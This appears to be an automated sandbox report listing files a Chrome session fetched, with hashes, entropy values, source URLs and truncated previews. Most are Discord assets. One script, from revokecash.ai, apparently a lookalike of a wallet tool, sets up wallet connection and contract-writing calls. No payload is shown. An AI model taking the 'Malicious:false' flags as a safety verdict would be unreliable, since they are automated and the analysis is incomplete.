                                                                          Preview:.PNG........IHDR...............U.....pHYs............... .IDATx..].TT[..4H......(vww...J7v=...N..........$DQ0Q...}..x(>....]g....p9......o.C...?#..5.DH..3B.[...T$w...*.).Q...R..1.....,D...KEr.........,....?....B.~..T$w...*.).Q...R..1.....,D...KEr.........,....?....B.~..T$w...*.).Q...R..1.....,D...KEr....?1.<....x....A~G..I.>..@.r..\1.#b.K.."&...).r.<.....lD...DQQ(:.FT..oD.....x<).+f.K.-b.K8...+.;*....p8".@X.@%...8$...l..F..K.s..k...C...}....)......<=b..M.R...O..8".~0..>$*...p...!...-..w...VH.42.....QQ( ....qNN.7.w.>...|B.=.5j...E().U\J.*...M..u..g..3f........W|P..>...0.....o...JzTit4..G|>.P^.9B]...|....-.%.o@#t.i.6n...I...:..56.kl.c.nm;.o.Y.&.45......a.a.o.x..p........'.O.o.*^/..B!......m....j...D.F.#z.\=e..}.lOs....E.y.Z.+...X.H..3.7.q3...zJa`B>..u/$.z0....'...Y=y..^.M.4..q.....~.|hX.X(D...6[..A....C..hi|<..zge...8u.2.RQV....)...v.....W fg..._."_...(....A.,....q2.l.......l....E........bvz.%&...[lf...~C..Uz..jow.......g....f.r...(....gK..k.9.\-M.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (55750)
                                                                          Category:downloaded
                                                                          Size (bytes):55805
                                                                          Entropy (8bit):5.385849551334539
                                                                          Encrypted:false
                                                                          SSDEEP:768:oGaASaWFXghCb2beROm7M6C1dNtiVh2aFj3tJWakPhD40DrS9AOhZHhWtD1V35iX:oGaNF4kOmstq2Q+DN2hZH61VwX
                                                                          MD5:3A328A58679DC7C65AEDE3025F694875
                                                                          SHA1:2B46354311CF752E3C734AC9E5F803BADA1EEA8C
                                                                          SHA-256:F6CEE9961DCDE12C0DBD889ADB3579AB836FCAA34C99828F36856B5F1DE9BB90
                                                                          SHA-512:E27FB833CCF2672530BA995226372614E55235D14B32C6201411E5239AF8D1D5A282071DA5F278272FF451AEE4D0948C4A713F66FF94B5819E970D76BC2FFC1B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/20117.7c4ea5cd4685b0442b9f.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20117"],{58319:function(t,e,r){"use strict";r.r(e),r.d(e,{Cache:function(){return Cache}}),r("424973");var n=r("926218"),i=r("737912"),a=r("871111"),Cache=function(){function Cache(){this.all=!1,this.before=[],this.after=[],this.between=[]}return Cache.prototype._cacheAdd=function(t,e,r){e&&(e=e instanceof Date?(0,i.clone)(e):(0,i.cloneDates)(e)),"all"===t?this.all=e:(r._value=e,this[t].push(r))},Cache.prototype._cacheGet=function(t,e){var r=!1,o=e?Object.keys(e):[],s=this[t];if("all"===t)r=this.all;else if((0,a.isArray)(s))for(var u=0;u<s.length;u++){var d=s[u];if(!(o.length&&function(t){for(var r=0;r<o.length;r++){var n=o[r];if(!function(t,e){if(Array.isArray(t))return!!Array.isArray(e)&&t.length===e.length&&t.every(function(t,r){return t.getTime()===e[r].getTime()});return t instanceof Date?e instanceof Date&&t.getTime()===e.getTime():t===e}(e[n],t[n]))return!0}return!1}(d))){r=d._value;break}}if(!r&&this.all){f
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):6764
                                                                          Entropy (8bit):5.082843439503491
                                                                          Encrypted:false
                                                                          SSDEEP:96:2NCUuro6sDd/WvMMhfWhhXepqWehNbjT+OVi+h+lJW4hljyW/dGDbDe6nki2W1dJ:XPsJgpwMpfjbdGz
                                                                          MD5:7398E210BCAA854E6270A92AF6844156
                                                                          SHA1:2218E85F9C275B83CB0D931206AB3489427AD350
                                                                          SHA-256:B8E7D84C08989DCADA15BBF20CE54242E7A9E033E3611D5F58BE6CAC25D4B50E
                                                                          SHA-512:26DC64EDB4383C02FDE1224AB9BF8230E79088C48561090293319A943ADD3A50573B1E615C899DDF6B3A103722B0CF6208573EFADF1531D3C258CCF91F0303B7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getDesktopListings?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1&page=1&entries=9&version=2
                                                                          Preview:{"listings":{"ecc4036f814562b41a5268adc86270fba1365471402006302e70169465b7ac18":{"id":"ecc4036f814562b41a5268adc86270fba1365471402006302e70169465b7ac18","name":"Zerion","homepage":"https://zerion.io/","image_id":"73f6f52f-7862-49e7-bb85-ba93ab72cc00","order":60,"app":{"browser":"https://app.zerion.io","ios":"https://apps.apple.com/app/id1456732565","android":"https://play.google.com/store/apps/details?id=io.zerion.android&hl=en&gl=US","mac":"","windows":null,"linux":null,"chrome":"https://chrome.google.com/webstore/detail/zerion-wallet-for-web3-nf/klghhnkeealcohjjanjjdaeeggmfmlpl","firefox":null,"safari":null,"edge":null,"opera":null},"injected":[{"injected_id":"isZerion","namespace":"eip155"}],"rdns":"io.zerion.wallet","mobile":{"native":"zerion://","universal":"https://wallet.zerion.io"},"desktop":{"native":"zerion://","universal":"https://wallet.zerion.io"}},"19177a98252e07ddfc9af2083ba8e07ef627cb6103467ffebb3f8f4205fd7927":{"id":"19177a98252e07ddfc9af2083ba8e07ef627cb6103467ffebb3f
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):551925
                                                                          Entropy (8bit):5.450366264059483
                                                                          Encrypted:false
                                                                          SSDEEP:6144:m99G//eKhHjNNmbPtM/5t4roEFKtZYYeLPUZvheBuxyVWyqGHOYAEVnw4Ho/Y0:eKhHjNNm4ZEaeIio/N
                                                                          MD5:E86C89EC5F585B676656779796E0566A
                                                                          SHA1:B5244BE44B8DB76175F429307E20F9F6E22EB58A
                                                                          SHA-256:1B65E2EAB161C1BF03E5D4C6563728C3E996C61C5FA8269CFAF256C191A92828
                                                                          SHA-512:81944F0AA3355CCFFDFC728041437EC4492FFC2B51869D3A647E4378D8DD23E2A6C55537EAFB715063844E193F3CB9A0C997CE567ACF7625586D0C6908440746
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/48449.255f5bbd30481bc03d50.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["48449"],{662697:function(e,t,n){let i={};i.isSafari=function(){var e,t,n;return(null===(e=navigator)||void 0===e?void 0:e.vendor)&&(null===(n=navigator)||void 0===n?void 0:null===(t=n.vendor)||void 0===t?void 0:t.indexOf("Apple"))>-1&&navigator.userAgent&&-1==navigator.userAgent.indexOf("CriOS")&&-1==navigator.userAgent.indexOf("FxiOS")},i.isMobile=function(){var e,t;let n=navigator.userAgent||(null===(e=navigator)||void 0===e?void 0:e.vendor)||(null===(t=window)||void 0===t?void 0:t.opera);return/iPhone|iPad|iPod|Android|IEMobile|Windows Phone|BlackBerry|webOS|Opera Mini|Nexus 7|Nexus 10|KFAPWI/i.test(n)||/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (12692)
                                                                          Category:downloaded
                                                                          Size (bytes):12747
                                                                          Entropy (8bit):5.375997290293681
                                                                          Encrypted:false
                                                                          SSDEEP:192:fqfgIEfn9Xy4y+eg58d/gCfnY2ar09Q1khled:fqYIEf9Xy3+eg5+gCfY2Vi6hc
                                                                          MD5:67A8BD70CA5BB26FE8B2CCE60D1C13B0
                                                                          SHA1:19F8F1FF1DBBF07777EB00473EA3B02F729A1CF2
                                                                          SHA-256:E23344A0661B9D8F7989D2BC844779BAFE216638266E87C11B53A27F0F2437B3
                                                                          SHA-512:5593035C6EE86165FE24E575B935A78B1031FA86559DF73A1BFDA8F337541AD7E030FD3910429B7F51CA4E77B4ADD0132455FD34883770CDAD12FE029237C239
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/49191.d845556dff27841ecd1e.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["49191"],{462274:function(e,i,l){"use strict";l.r(i),l.d(i,{useColorStore:function(){return c},maybeFetchColors:function(){return f},default:function(){return p},useAvatarColors:function(){return _}}),l("222007");var t=l("884691"),n=l("656280"),r=l.n(n),u=l("308503"),o=l("446674"),d=l("206230"),s=l("284679"),a=l("103603");let c=(0,u.default)(()=>({palette:{},fetching:{}}));async function f(e){null==c.getState().palette[e]&&await m(e)}async function m(e){if(!c.getState().fetching[e]){c.setState(i=>({fetching:{...i.fetching,[e]:!0}}));try{let i=await (0,a.getPaletteForAvatar)(e),l=(0,s.getComplimentaryPaletteForColor)(i[0]);c.setState(t=>({fetching:{...t.fetching,[e]:!1},palette:{...t.palette,[e]:[...i.slice(0,2),...l]}}))}catch(i){c.setState(i=>({fetching:{...i.fetching,[e]:!1}}))}}}function p(e,i){let l=!(arguments.length>2)||void 0===arguments[2]||arguments[2],[t]=_(e,i,l);return t}function _(e,i){let l=!(arguments
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):1599
                                                                          Entropy (8bit):7.821138062732205
                                                                          Encrypted:false
                                                                          SSDEEP:24:gYzTx8OQ67P4/6KEH/l2fynaS0mskzDTlW5wRnCyYP12HSB4vLpUVrRuoB:dNE67w/6KOl2fsaS0UDzMdgA0pUVluk
                                                                          MD5:B793FEE8413648B6CF59AB51FBA83FE3
                                                                          SHA1:5869A1B152E577D9446CEBD4728A190B570B0FD9
                                                                          SHA-256:3B89DD2F6C26F0740BA7880E4E1188AE2C7C4626475FAFACEF4B92708DB7C260
                                                                          SHA-512:A2876764AE6417CF3C576CF89B83B332AF500B300875A4F29C16111A2B3BF8FD5B2E00D7440E64411B52428F404FA528F76C9909250482F2A7C14DD67A15351A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...0...0.....`......;PLTE.f..h..m.e......d..e...........m..k..g..e..p....>?=...9.V...bca..........`.MJOa).ljm........XZY@.d...qrq....[..`....x{x.F.bYf.T.).7....X.C.... ..ECEN.vh7....:.F......K*\|7.T)lcS>565[.r.k.m/..^....)))p..F/RSPT.H....s..N.lY=U..u>.>.R\..k<.vA.YBeW5.gJvym.#.<8)A".+ZD&.?.G.d.[.tP..L.a..w.gT#.Y..a....A0.o93.t!.{..N..c-.....pHYs.................IDATx....S.L..7.n.BBH..w.M.H....k..........U.P..g..39ON.A.Q...4N...AK..tS.'....?.S....n.%..'.%......1..4........9..c9...n.H].%f............. QX..&.........@..Zl....wvvv.G.....x..!...0..f...W...i".@.<8(...~I..B..P.j..l...3..,..9......#...d...bq`&Z_...#...#.d"(.i^...Sf..k..!. ....yYX.(.;....M...4.....c.@....)..U.......b..U.}A..O....?'..p......D(.}......Y...AEHd.......z.j....UV.*a?-...`.H...O.U&..%.f.,+;...P..BR.....EAv... #u....X..<.3..Xzp....su~~:.."Q.i..L..,TJQ...sx,%..HV.}...M.'...0B.eF....x..N.....`DD....4....^8.;.r.... D.@..pw.s).y..(..}...1....`.!Q&.f)...D.G...{&.p'5"...2...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGB, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):13664
                                                                          Entropy (8bit):7.980160074277059
                                                                          Encrypted:false
                                                                          SSDEEP:384:E35GnZ8/TvIo1ZENhVmZKqa8kD7J/o+1bH9LGMvArxb0:y5GnuZsMZKqU6cD96CArS
                                                                          MD5:1591539C44BF48640C98506318F734B8
                                                                          SHA1:5058EED739D3A2545F0E0A4508309674B9875C5F
                                                                          SHA-256:C56259278059D5A18693C3AF0697A33E12ADAAFE9FEA58E0612AAC996585618D
                                                                          SHA-512:12850DC8450DD1C4D7EC605382D78A3146E11BBEE4C4E1340938D0D908F61F5138BDDCB3C2F796ADA3EC698DCF18CE37D7B6B33A34688441D9A46571D3DE3E74
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR...............U.....pHYs............... .IDATx..].TT[..4H......(vww...J7v=...N..........$DQ0Q...}..x(>....]g....p9......o.C...?#..5.DH..3B.[...T$w...*.).Q...R..1.....,D...KEr.........,....?....B.~..T$w...*.).Q...R..1.....,D...KEr.........,....?....B.~..T$w...*.).Q...R..1.....,D...KEr....?1.<....x....A~G..I.>..@.r..\1.#b.K.."&...).r.<.....lD...DQQ(:.FT..oD.....x<).+f.K.-b.K8...+.;*....p8".@X.@%...8$...l..F..K.s..k...C...}....)......<=b..M.R...O..8".~0..>$*...p...!...-..w...VH.42.....QQ( ....qNN.7.w.>...|B.=.5j...E().U\J.*...M..u..g..3f........W|P..>...0.....o...JzTit4..G|>.P^.9B]...|....-.%.o@#t.i.6n...I...:..56.kl.c.nm;.o.Y.&.45......a.a.o.x..p........'.O.o.*^/..B!......m....j...D.F.#z.\=e..}.lOs....E.y.Z.+...X.H..3.7.q3...zJa`B>..u/$.z0....'...Y=y..^.M.4..q.....~.|hX.X(D...6[..A....C..hi|<..zge...8u.2.RQV....)...v.....W fg..._."_...(....A.,....q2.l.......l....E........bvz.%&...[lf...~C..Uz..jow.......g....f.r...(....gK..k.9.\-M.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):2058
                                                                          Entropy (8bit):4.614306214221163
                                                                          Encrypted:false
                                                                          SSDEEP:48:CVHe7HtOty0VulV1/8CXP0Cjek7aj4clug9ai:iANEyxx8UPTXaj4cogIi
                                                                          MD5:E1349377226366F95F85AB9EAC4586D3
                                                                          SHA1:9A3A00B6E6AB0A240363F4E4DB2F5288227FF76B
                                                                          SHA-256:2CA673A9914A35A230469A8A0FD6B4DB293B236DEA391633B53339AFE577A92E
                                                                          SHA-512:7C16967D1960CDE4914F71B6FE347A7764AAED42366A87920597D225F3874B5B34A00C5089564BEBF0A919C419049DB99B27128CC81BC28A1492460FD199F9E7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/a826e445dff97cf15335.svg
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve">. <defs>. <clipPath id="a" clipPathUnits="userSpaceOnUse">. <path d="M0 36h36V0H0v36Z"/>. </clipPath>. <mask id="b">. <g>. <rect x="0" y="0" width="100" height="100" fill="white" />. <path d="M11.708 29.849a1.296 1.296 0 1 0-2.591-.001 1.296 1.296 0 0 0 2.591 0" fill="black"/>. </g>. </mask>. </defs>. <g>. <g>. <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)">. <g>. <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504 31.474 6 26.459 6h-15.71C6.607 6 3.727 13.224 6.75 17.438c0 0 4.5 3.5 6 .812" fill="white"/>. </g>. <g>. <path d="M13.008 17.864C8.02 10.927 6.968 6 10.75 6c-4.142 0-6.577 6.187-4.468 11.031.463 1.064 1.758 2.492 1.758 2.492l4.18.008c.162-.32.598-1.366.79-1.667" fill="white"/>. </g>. <g>. <path d
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):137
                                                                          Entropy (8bit):4.832107377824175
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WH7W+lFAATcvcmJDmJS4RKb5KVErcHrFvR8hiJqGrqL0:t6Abli/c8mc4slmrFv2hiAe
                                                                          MD5:70275FE3104CF1D3388586AD8FFD478E
                                                                          SHA1:473EA46F5B22B5C7D14C39EE9C0C82811593883B
                                                                          SHA-256:3269CF3FDA7681388472225BAD39B6BB3B26088A0A03B6CD5796195F0114CE13
                                                                          SHA-512:044C0F8F1583FAEBA3A23FF2DF821A5A0E79C548DB3A6474614894DA2CB125476227407F865CF20D32DC7E4D9ADE09EBA6317EFB787EEED2570C0EBDFC401D2A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/8f581f91e7e650ac87a2.svg
                                                                          Preview:<svg fill="none" height="8" viewBox="0 0 9 8" width="9" xmlns="http://www.w3.org/2000/svg"><path d="m4.5 0 4.5 8h-9z" fill="#fff"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):140709
                                                                          Entropy (8bit):5.283275456988055
                                                                          Encrypted:false
                                                                          SSDEEP:1536:gI6K+zEN1SU14A0iH7t+5yKNhKHZCOnrqYrW0z/SCsL:XN1GAlKmrzY
                                                                          MD5:B57F45095B443009C496AB1C1471BE7F
                                                                          SHA1:E9AF53D0E3E3AB155ABAFA07D23C79DAE2C71F2C
                                                                          SHA-256:408EBF752CDDB6BC3782D7266FA4A7AA759BB9D4255F8D17CC7AADE0ECB971B5
                                                                          SHA-512:F54E969D8FEBA2B2B1AF0B88F3A158FB7AC57DB6DAE58DFFC70F5CD49EA3AF3FC66B58C855EEC78D2E52ECE8ED720E4A2953E57EEC21E9652116B2D7CA4FD30A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/13942.42b3309fce7f57e5eb63.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["13942"],{969176:function(t,e,i){var s=i("354069");t.exports=function(t,e){return s(t,e)}},469520:function(t,e,i){i("424973"),i("311790"),i("477657"),i("811875"),i("90301"),i("652153"),i("28797"),i("817884"),i("597349"),i("667536"),i("690341"),i("477315"),i("990131"),i("527135"),i("453061"),i("659510"),i("667500"),i("370692"),i("511434"),i("313619"),i("654714"),i("287168"),i("956660"),i("222007"),i("702976"),i("781738");var s,r,n=(s=new Date,r=4,{setLogLevel:function(t){t==this.debug?r=1:t==this.info?r=2:t==this.warn?r=3:(this.error,r=4)},debug:function(t,e){void 0===console.debug&&(console.debug=console.log),1>=r&&console.debug("["+n.getDurationString(new Date-s,1e3)+"]","["+t+"]",e)},log:function(t,e){this.debug(t.msg)},info:function(t,e){2>=r&&console.info("["+n.getDurationString(new Date-s,1e3)+"]","["+t+"]",e)},warn:function(t,e){3>=r&&console.warn("["+n.getDurationString(new Date-s,1e3)+"]","["+t+"]",e)},error
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):92844
                                                                          Entropy (8bit):5.326611052507591
                                                                          Encrypted:false
                                                                          SSDEEP:1536:MvlhEvlYLmdd52ndZxWZ3Z+g5f5m25hDG+Gw:vCU575mwD8w
                                                                          MD5:B3820B32BF03849A7A6DCC4FE0A0F6A1
                                                                          SHA1:CA0DE8DADE3F34D53E543AA4E0DB0CE3C99C64B2
                                                                          SHA-256:704616FCF667ABE48628DDC0110B5E5171CCA735FBE9C768B8B73ABC6CA21F16
                                                                          SHA-512:6C7D28BAE890A3CB8A9C9F218407FAA68993DE8E70714E5F7537C5AC820C1A2E31672BF5289519275AEF4B069714D361EEB5030CAC48DBCFE3A289F35CC33A74
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/chunks/main-92fafea216160eb7.js
                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{89219:function(e,t){"use strict";function r(e,t,r,n,a,o,l){try{var i=e[o](l),s=i.value}catch(e){r(e);return}i.done?t(s):Promise.resolve(s).then(n,a)}function n(e){return function(){var t=this,n=arguments;return new Promise(function(a,o){var l=e.apply(t,n);function i(e){r(l,a,o,i,s,"next",e)}function s(e){r(l,a,o,i,s,"throw",e)}i(void 0)})}}Object.defineProperty(t,"Z",{enumerable:!0,get:function(){return n}})},25321:function(e,t){"use strict";function r(){return(r=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}function n(){return r.apply(this,arguments)}Object.defineProperty(t,"Z",{enumerable:!0,get:function(){return n}})},1322:function(e,t){"use strict";function r(e){return e&&e.__esModule?e:{default:e}}Object.defineProperty(t,"Z",{enumerable:!0,get:function(){return r}})},6687:function(e
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):743975
                                                                          Entropy (8bit):5.561247405502135
                                                                          Encrypted:false
                                                                          SSDEEP:6144:08UanHKvzJPFSn7j8QHwqY+wltsbMeBdSbRbSJUBI78iq/aeLujAW6WPH8wW:0U3w8SbXWvw
                                                                          MD5:91171255CB1E442B0EEDA5E0F52F8ADA
                                                                          SHA1:C093F171EABEAFD8616EB60579AE3958968A87C3
                                                                          SHA-256:24A8E50A60812B12EACFD39A4470031AAF60C3307951A6945590705983EE6543
                                                                          SHA-512:EFF527EAF5177AB457A1170DA33CAEDF702537ADE742816755E015380810D035410E1074AC0170959E2BEC05347DD2B931533CBFCF9C3919F5635FA49190712E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/67615.9ab2f39e6303de9fa164.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["67615"],{273215:function(e,t,n){"use strict";e.exports=n.p+"63900a1ba1f23d305c53.png"},719933:function(e,t,n){"use strict";e.exports=n.p+"2d8d31d0ce7c0e673266.png"},90026:function(e,t,n){"use strict";e.exports=n.p+"a5bb35518e19a27b57be.png"},824839:function(e,t,n){"use strict";e.exports=n.p+"16b667dc5539a47aa346.svg"},935119:function(e,t,n){"use strict";e.exports=n.p+"b0efcdc15f8bd689c89f.svg"},1890:function(e,t,n){"use strict";e.exports=n.p+"6d387ec5eedee450a1c6.svg"},898085:function(e,t,n){},495873:function(e,t,n){},778583:function(e,t,n){},482803:function(e,t,n){},503745:function(e,t,n){},555919:function(e,t,n){"use strict";e.exports=["7z","ade","adp","arj","apk","application","appx","appxbundle","asx","bas","bat","cab","cer","chm","cmd","cnt","cpl","crt","csh","deb","der","diagcab","dll","dmg","docm","dotm","ex","ex_","exe","fxp","gadget","grp","gz","hlp","hpj","hta","htc","inf","ins","ipa","iso","isp","its","j
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (32318)
                                                                          Category:downloaded
                                                                          Size (bytes):32377
                                                                          Entropy (8bit):5.468713389258694
                                                                          Encrypted:false
                                                                          SSDEEP:384:mgnoi9I7gGvLfKgenh46GvTjYvJaloQRhOv4medluN+Mlj7u5UW8NbtboQBtZQGG:mgnIw4BwI9ORAUtZ5p4Zw3SIAz
                                                                          MD5:E5A064E62694558F14289FBD7FA14436
                                                                          SHA1:280269881DF08792DEC08B9A450B4F2BA871D3F8
                                                                          SHA-256:5D68134609C7FDFA84B0E3C9A5594E5B06A209C0382A5BFDB99676D6F58CFE66
                                                                          SHA-512:A8B66583F09AAC4928F42BFD3D6FA15DF7C4D9D2238FA51F900797A73CB965A36C9304E148D689BB9732BF4035F019F8D3D6682634BDD7F8D509D3EC49BF30C1
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/48590.30373425cc01194cd313.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["48590"],{772051:function(e,t,n){"use strict";n.r(t),n.d(t,{ClydeExperimentState:function(){return r},default:function(){return u}});var l,r,a=n("862205");(l=r||(r={}))[l.None=0]="None",l[l.DefaultOn=1]="DefaultOn",l[l.DefaultOff=2]="DefaultOff",l[l.ComingSoon=3]="ComingSoon",l[l.ClydeProfiles=4]="ClydeProfiles";let i=(0,a.createExperiment)({kind:"guild",id:"2023-03_clyde_ai",label:"ClydeAI",defaultConfig:{experimentState:0},treatments:[{id:1,label:"Enabled (Default Off)",config:{experimentState:2}},{id:3,label:"Enabled (Default On)",config:{experimentState:1}},{id:4,label:"Coming Soon",config:{experimentState:3}},{id:5,label:"Clyde Profiles",config:{experimentState:4}}]});var u=i},254927:function(e,t,n){"use strict";n.r(t),n.d(t,{isClydeEnabledinGdms:function(){return a}});var l=n("862205");let r=(0,l.createExperiment)({kind:"user",id:"2023-06_clyde_ai_gdm",label:"Clyde in DMs/GDMs",defaultConfig:{isClydeEnabledinG
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 1000x1000, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):216367
                                                                          Entropy (8bit):7.986086507478987
                                                                          Encrypted:false
                                                                          SSDEEP:6144:aaSAS+Q0YsUECFnaUxabQ2O5qkfJ6o76Me:vSKQvsUECFnaUxaM9gC6Z
                                                                          MD5:C5219F0C35C5996A197B75FD81F18AD0
                                                                          SHA1:3278D4579906B4CA14C51332E59AC943B3C90D42
                                                                          SHA-256:EF319C7DC54DDA2711DE8A6F0E776537C978A6F110A5597FF32C9DEB607534C4
                                                                          SHA-512:DBA2BF2C22C4B13C2931322993A0127BEB99FCF44C5459D2DFF88DD021215ABCEC2BC9EB6FD02EFB4FFF134A5AC07141FAEDB4D89D6512F2315CB1B5003BA2F7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_1080,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Flarge_Boring_Security_Mur_All_square_dff8d7bd73.jpg&w=1080&q=75"
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."...............................................................................8r\.\..\.%`d.m.WS...o..qA.P.....t.[.mI..X.}G............(b.!=.wC...G.Jj.....0..<.:..^..n]*.^wb.7..zuI.d].......rJ...=.]K...$...,.....RV..).....d.t...xn.j..a.....2..b...:h.F.mb..^x.+Z..C.M.2W....g..........*...WC.\...o..... \...4..3F........=......kB...X.T...mv.*..}.{.".D..U...^sj.RAv.eg.>;9sq.B.....n?r.H._.>Z>..K.B.*|.r.N>...*j.q$...U.f..{...Wc...SM....).....5IZ e..y.h\.y..9...k!..@.QR..7..e.^e`.63..z..^.~.v....U.NX....d....v...7..nzS.W...I......A......j...Ph......G...IK.....Q.5p(5\....,$.(7...iv.y0...... ..'Ml..........&.|..w.k..6...c.l......K.3E....N..oF...G4.......c<../[<.(.r.a..b#..C..cx..y.\G...n...|..=Aq.]y.....]..2.&....6.C..i. 3.H.@'D .c..X;...N...7...(.~...Z..tr+.A....Pa.#a.5..K]..H..N[w.7....@..e=ty...K......-
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Java source, ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):4518
                                                                          Entropy (8bit):5.24700433457782
                                                                          Encrypted:false
                                                                          SSDEEP:96:TXiDDJn2FSIGhiGieNgV/g+4+CWsPbrlZnOEjOpH:TXAn2FyktkE
                                                                          MD5:2212A08F9131DA4086B286D0A7486505
                                                                          SHA1:3B09269183A532D1EED3D4F3D299CFAF8681688D
                                                                          SHA-256:8E233677FFFEA482EAAA063FE03185A41E7F6A9B21129D092FC3D8A58630C881
                                                                          SHA-512:CC703DFD88A84110F515CE5758E4C33AF609FD70554161CA6348D72E898C091741352EF5D2DCD239D927650A2D300B6929C15471B249EE4E7A667AF4ED44A53D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/walletConnect.js
                                                                          Preview:window.process = { browser: true, env: { ENVIRONMENT: 'BROWSER' } };..import {. EthereumClient,. w3mConnectors,. w3mProvider,. WagmiCore,. WagmiCoreChains,. WagmiCoreConnectors,.} from "https://unpkg.com/@web3modal/ethereum@2.7.1";..import { Web3Modal } from "https://unpkg.com/@web3modal/html@2.7.1";..const { mainnet } = WagmiCoreChains;.const { configureChains, createConfig, getAccount, watchAccount, watchContractEvent, prepareWriteContract, writeContract, getPublicClient } = WagmiCore;..const chains = [ mainnet ].const projectId = '4de540f0804c83871ac4d89ebb9031e9'..const { publicClient } = configureChains(chains, [w3mProvider({ projectId })]).const wagmiConfig = createConfig({..autoConnect: true,..connectors: w3mConnectors({ projectId, chains, options: {...metadata: {....name: 'revokecash.ai',....url: 'https://revokecash.ai/',...},..} }),..publicClient.}).const ethereumClient = new EthereumClient(wagmiConfig, chains).const web3modal = new Web3Modal({ projectId }, ethereumClien
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (7909)
                                                                          Category:downloaded
                                                                          Size (bytes):7964
                                                                          Entropy (8bit):5.107932895178409
                                                                          Encrypted:false
